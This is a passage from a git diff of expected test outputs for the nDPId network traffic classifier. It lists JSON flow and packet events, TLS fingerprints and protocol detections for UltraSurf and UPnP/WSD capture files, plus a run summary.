dLTeXtt4V8bNumuTzdRWus9vZCGnaJKWYY+IluLtxDKaBHhULnRKPZr7a3fqY4eZZWnvSv+6SyQfi\/guF4IkYLhqf3LM1QbKUpuoYVTCXDg\/iejAGelMIOMZk\/34eSGVjsk9H4ZDrbf+Wviyu10e\/3LGX4vZqXdNId0qCEAQQsb5bj67rIpqEUfO1gjj68uRkOWA5pTXz1Cw5OGMJDODQJgEJUgUxpgbiqUn1yGaEKOOaiaN2Vv5\/u+w6mqQni+gBiA0+4K0zEMbn8XRxSib6SxlyLQVFPK3+8NFm9X2am1AtSH1\/PoCM1+A0L4I8UddMiaV4KJVbD4gIsbkZTEL2rNpB7+3TEPLkz\/oWqgDlYpiSJoug71nGWFcD+HEERUlO5Z93B7c4XWme9gT2XSraJ9EGS47MTy8E5gSuzHgT06aAD1VDe0EzdVIhzO6QfLKRVyqK\/DkDAcF1dU\/CysJQuLXO26HE1qiZstmUL\/PmaIF1CAre3aq1TiBtKi47RcAusmfTZViQ5pBnP52RilqIkeFHO7qJ+Xe7UbBid1eckGMDShESIKSMkg323ewkUsCQrdbbCQCNxMP\/vovWIiozrHVfadoXMR1+s3vDeGvdijxN0cQlXKhRXEHz1q9AFZPP6OvHtyaigQOx7Av7+CCavPWtRnhVyR2jLsjvU\/P8W5IFa8Qs0a8CJRQpkCWniRyCA3gsdHuiU5LPzN9N6ilFVKYWl8zCdx1E0DuWVnebVHPp\/mSPBcwJb6Kn0mZE5F6Slv4ios+F0zFBa\/+ONDhj8YI3D0pzybuWoGGURZpxxZvXyeMYFUqAzWQpmxOYCpDyYaRzpVXybXDJxWUfNGwmd6Ve5t6JHTxK332fJRagMHTraU5uEpzRuAnBCqVX\/orlzGUbI38lDmfktCRZhIZ0TA4WOuMezAS\/U5UeZ\/Ky36Btzeqc\/GtSNTwfx5pintfeIcHnEiV69AT2a7sR3PISNs\/w0efL492At330L6CabtPqbX+3L9tP+74e7pNSOxbl7oi\/mRnKkb9k8n2BH6yIJJt5VxxH74+2OAUxERThSHVZlYSiPBPktL4R30L859p0z2Uz6qmrKoN1is1fQXX8xGHOr7PkuLtDJqwFDVFJJ9YkA7Dx2pq++TaR\/9pl4AeqnylRZtWT3EJRF\/MYY3nnisHit78gzVET6d1BuDKtwoAyw4mKyfoqWDMp6JOacbgYmXKL3bRC0doX8dbGOchwnFREadeVLCi\/Q5"} +02216{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1656652731631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1358,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1358,"pkt_l4_len":1320,"thread_ts_msec":1656652731631,"pkt":"zBr67JUAcGlaOmiJgQAAyAgARQAFPM7xQAA3Bt\/lQTFEGQqEABfDhZQKC2OXGUpUkTKAEAFmw0YAAAEBCAom3sgTA1a0\/SxS3iaqHGBX0a8rgr8EFwZv7fbGR3LsZjVMCYTlteWImHMg7dpDQx6QAkVSKrBDRWsAgkFKUO9XRHQzEdcVJv+Jk6+iQYy27OR2Ruv0q0NyJCK8q8neLYQxD7xGx95YziHhCPmx+v2VJKWqXvo5pekBzrhigp\/0TmX3aYQplVTgwksBVP1wSVYSvnxpw4x3MGHY6EK1PhkChr6I2QaCOOskNMVQXjje52Gr0TD6cnIJniT0zvgTXSdGXH4d1pNmH6VI38eKJmR97TCaHW4VbObiULCNV965z+H0nCojIGmrzSNlYRkWatbld8Zbak+Ve9Ye2qFSUfesBybrU8MPKChWDS4szas\/0\/+O+hp7fTEBfmCOnTwpeZ+9ckDlu30IjD3klrlcZcGx59JJ23VaL3mRHXN2m7OYXYqgEUyKkpkk87MSdGKaT3iv+xeB8fdAD0S5iESPxvCatNGVxlnPWQC6LE2Mwk\/UPzo8wmxmWU\/4g2SzkG6fIhc2KfKoBTSS\/18XObBYhTCKn8tmchtQQnCFEhJwUqNPVQHAM7VWv97\/MrpK1Gg3ow57h3u6bsT3zD+7JqhTzfzSb+JLf+gPPuPmKrDBND362h9HtUe4u54hmK0emiAYbKHemgqk5ObUECg98wBR8GbmhEjkgqd5l9MpJjXEnZd7YjYb9HqCPVuTVofELhtwiquLU41YKvkqj9qHY3i83C4I5rsGWBIQz9jCnG\/LAO0gc+K5MhM0jD8w9afyXqZxxIWbvFCzYdvaAxFsd+dbs6QyAzMjBlRwZZJGoKCRudoGu78iGcHZ9v4JjFh8PqFI5RKE50MXupgqZhn5s+mncV4ED4BR62InyQMO+2lSV8XApXho3jZD2BZYaHL8BxzViM2AnSYU40nV5P\/9Zcawh1bVQjVPNsaeHWxMJc5P+uhgQ7yN5cDddbbbFops91CwGboz\/Y\/iUMqNL+Au752094lP9CLdBHTtF0nwGndsTr7PXV2am5lVFY+07I13Rnwh96VlnzAEErq6QUJMFpXVjoILKF75mfhkzufc5ww1btEyyIToFedBu8inrM2nSfVR4GSH1acVyxGJN\/xPMqMoz7qX11hSlDnDNA70XCXcPknSvGQJeC42YvRZuyBXR4bSZJpW3uxAIMisVpx8HuvqUlRDvWeTkl\/KlLkLPqVG6A7V9IJ4CzPp2LGxX0mxIii\/hq8qrdBvVjXBSMG2kFGd1Gk2CYKUDdUedzWwHbeA+x19\/Z8W9DscgX5Ingwo9qBoCIrSYVEyo5A+Bu6P2A6MYai8bIL3N1ixp0uHekzl1S5Y5ONHOtGVOFVnwRx49hvB6HPO9wc0rIJSIsq9YnBJNWgIZNFkCjlBnZHso+vfBKU6hgL+4B1v8gJk8\/+OinGcG00MXqyjoV0hIPvX8fcu6dH9TclFMmJS42m7WMCCPvMCk17qoAwiC5hrfwamrAiYI\/PEcMUUmJwNoLE7aKVZ7926CN5wXkVGlgQDYNSoxPqXoHqtbU6arZQtfgfxuD27lKKUbZm7keaLAlr7T5d0Wedi07GEwl0yp+Np4OWX5kU2Sgn3juSmnKnaCzCcLk2W4PsHrD6xcXA4Ni176mRo2kV4lUcSZ9ReNwImdlBbdKoXwKkzjV8Aa0hRPMOK2kTBCfB1GhE91TGa9BbzjtvK4JbGfzJcCXKDHd6qGUGMR+lTKBl2gIfVx9fr7SRFiR3Ky\/s="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2962,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656652778161,"flow_last_seen":1656652778161,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656652778161,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38120,"dst_port":50053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2962,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1656652778161,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1656652778161,"pkt":"cGlaOmiJzBr67JUAgQAAyAgARQAAPJe\/QAA\/BhQYCoQAF0ExRBmU6MOFszN1DQAAAACgAv\/\/UcYAAAIEBVAEAggKA1bisgAAAAABAwMI"} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2970,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1656652778372,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1656652778372,"pkt":"zBr67JUAcGlaOmiJgQAAyAgARQAAPAAAQAA3BrPXQTFEGQqEABfDhZTovxOnA7MzdQ6gEnEg1IYAAAIEBYwEAggKJt9+2gNW4rIBAwMJ"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2974,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1656652778421,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1656652778421,"pkt":"cGlaOmiJzBr67JUAgQAAyAgARQAANJfAQAA\/BhQfCoQAF0ExRBmU6MOFszN1Dr8TpwSAEAFXcrgAAAEBCAoDVuLwJt9+2g=="} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2975,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656652778161,"flow_last_seen":1656652778421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1656652778421,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38120,"dst_port":50053,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"b592adaa596bb72a5c1ccdbecae52e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2977,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1656652778161,"flow_last_seen":1656652778641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1288,"flow_tot_l4_payload_len":1805,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1656652778641,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38120,"dst_port":50053,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"b592adaa596bb72a5c1ccdbecae52e3f","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7468,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656652831434,"flow_last_seen":1656652831434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656652831434,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38152,"dst_port":50053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7468,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1656652831434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1656652831434,"pkt":"cGlaOmiJzBr67JUAgQAAyAgARQAAPDStQAA\/BncqCoQAF0ExRBmVCMOFn9EiagAAAACgAv\/\/g5YAAAIEBVAEAggKA1cWxwAAAAABAwMI"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7491,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1656652831643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1656652831643,"pkt":"zBr67JUAcGlaOmiJgQAAyAgARQAAPAAAQAA3BrPXQTFEGQqEABfDhZUIPEwzlZ\/RImugEnEgLEwAAAIEBYwEAggKJuBPGgNXFscBAwMJ"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7496,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1656652831673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1656652831673,"pkt":"cGlaOmiJzBr67JUAgQAAyAgARQAANDSuQAA\/BncxCoQAF0ExRBmVCMOFn9EiazxMM5aAEAFXyn8AAAEBCAoDVxcDJuBPGg=="} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7499,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656652831434,"flow_last_seen":1656652831673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1656652831673,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38152,"dst_port":50053,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"b592adaa596bb72a5c1ccdbecae52e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7502,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1656652831434,"flow_last_seen":1656652831894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1288,"flow_tot_l4_payload_len":1805,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1656652831894,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38152,"dst_port":50053,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"b592adaa596bb72a5c1ccdbecae52e3f","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8142,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2971,"flow_first_seen":1656652731609,"flow_last_seen":1656652778381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2576,"flow_tot_l4_payload_len":2764868,"flow_avg_l4_payload_len":930,"midstream":1,"thread_ts_msec":1656652839654,"l3_proto":"ip4","src_ip":"65.49.68.25","dst_ip":"10.132.0.23","src_port":50053,"dst_port":37898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UltraSurf","breed":"Acceptable","category":"VPN"}} +00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8142,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4525,"flow_first_seen":1656652778161,"flow_last_seen":1656652831683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2576,"flow_tot_l4_payload_len":4386409,"flow_avg_l4_payload_len":969,"midstream":0,"thread_ts_msec":1656652839654,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38120,"dst_port":50053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8142,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1656652831434,"flow_last_seen":1656652839654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2576,"flow_tot_l4_payload_len":336442,"flow_avg_l4_payload_len":520,"midstream":0,"thread_ts_msec":1656652839654,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38152,"dst_port":50053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8142,"source":"ultrasurf.pcap","alias":"nDPId-test","packets-captured":8142,"packets-processed":8142,"total-skipped-flows":0,"total-l4-payload-len":7487719,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1656652839654} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 8142/8142 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 7487719 bytes +~~ total detected protocols..: 3 +~~ total active/idle flows...: 3/3 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6250134 bytes +~~ total memory freed........: 6250134 bytes +~~ total allocations/frees...: 129034/129034 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 465 chars +~~ json string max len.......: 3973 chars +~~ json string avg len.......: 2218 chars diff --git a/test/results/upnp.pcap.out b/test/results/upnp.pcap.out index 301380637..4faa6de5a 100644 --- a/test/results/upnp.pcap.out +++ b/test/results/upnp.pcap.out @@ -2,16 +2,16 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"upnp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1541515314826} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314826,"flow_last_seen":1541515314826,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314826,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01338{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1541515314826,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":718,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":718,"pkt_l4_len":664,"thread_ts_msec":1541515314826,"pkt":"MzMAAAAMGNvyL6AYht1gDeGUApgRAf6AAAAAAAAANEE9JG0wqAf\/AgAAAAAAAAAAAAAAAAAM5jQOdgKYg108P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvUmVzb2x2ZTwvd3NhOkFjdGlvbj48d3NhOk1lc3NhZ2VJRD51cm46dXVpZDozZjQyZGM5YS0yNGNlLTQ4ZDEtODhmOS0xNmI5NmExMzdkNzE8L3dzYTpNZXNzYWdlSUQ+PC9zb2FwOkhlYWRlcj48c29hcDpCb2R5Pjx3c2Q6UmVzb2x2ZT48d3NhOkVuZHBvaW50UmVmZXJlbmNlPjx3c2E6QWRkcmVzcz51cm46dXVpZDplMzI0ODAwMC04MGNlLTExZGItODAwMC0wMDFiYTk5ZWM5NTY8L3dzYTpBZGRyZXNzPjwvd3NhOkVuZHBvaW50UmVmZXJlbmNlPjwvd3NkOlJlc29sdmU+PC9zb2FwOkJvZHk+PC9zb2FwOkVudmVsb3BlPg=="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314826,"flow_last_seen":1541515314826,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314826,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314826,"flow_last_seen":1541515314826,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314826,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314827,"flow_last_seen":1541515314827,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314827,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1541515314827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1541515314827,"pkt":"AQBef\/\/6GNvyL6AYCABFAAKsCtYAAAERvobAqD1C7\/\/\/+uYzDnYCmBmmPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczpzb2FwPSJodHRwOi8vd3d3LnczLm9yZy8yMDAzLzA1L3NvYXAtZW52ZWxvcGUiIHhtbG5zOndzYT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nIiB4bWxuczp3c2Q9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5Ij48c29hcDpIZWFkZXI+PHdzYTpUbz51cm46c2NoZW1hcy14bWxzb2FwLW9yZzp3czoyMDA1OjA0OmRpc2NvdmVyeTwvd3NhOlRvPjx3c2E6QWN0aW9uPmh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5L1Jlc29sdmU8L3dzYTpBY3Rpb24+PHdzYTpNZXNzYWdlSUQ+dXJuOnV1aWQ6M2Y0MmRjOWEtMjRjZS00OGQxLTg4ZjktMTZiOTZhMTM3ZDcxPC93c2E6TWVzc2FnZUlEPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOlJlc29sdmU+PHdzYTpFbmRwb2ludFJlZmVyZW5jZT48d3NhOkFkZHJlc3M+dXJuOnV1aWQ6ZTMyNDgwMDAtODBjZS0xMWRiLTgwMDAtMDAxYmE5OWVjOTU2PC93c2E6QWRkcmVzcz48L3dzYTpFbmRwb2ludFJlZmVyZW5jZT48L3dzZDpSZXNvbHZlPjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314827,"flow_last_seen":1541515314827,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314827,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314827,"flow_last_seen":1541515314827,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314827,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 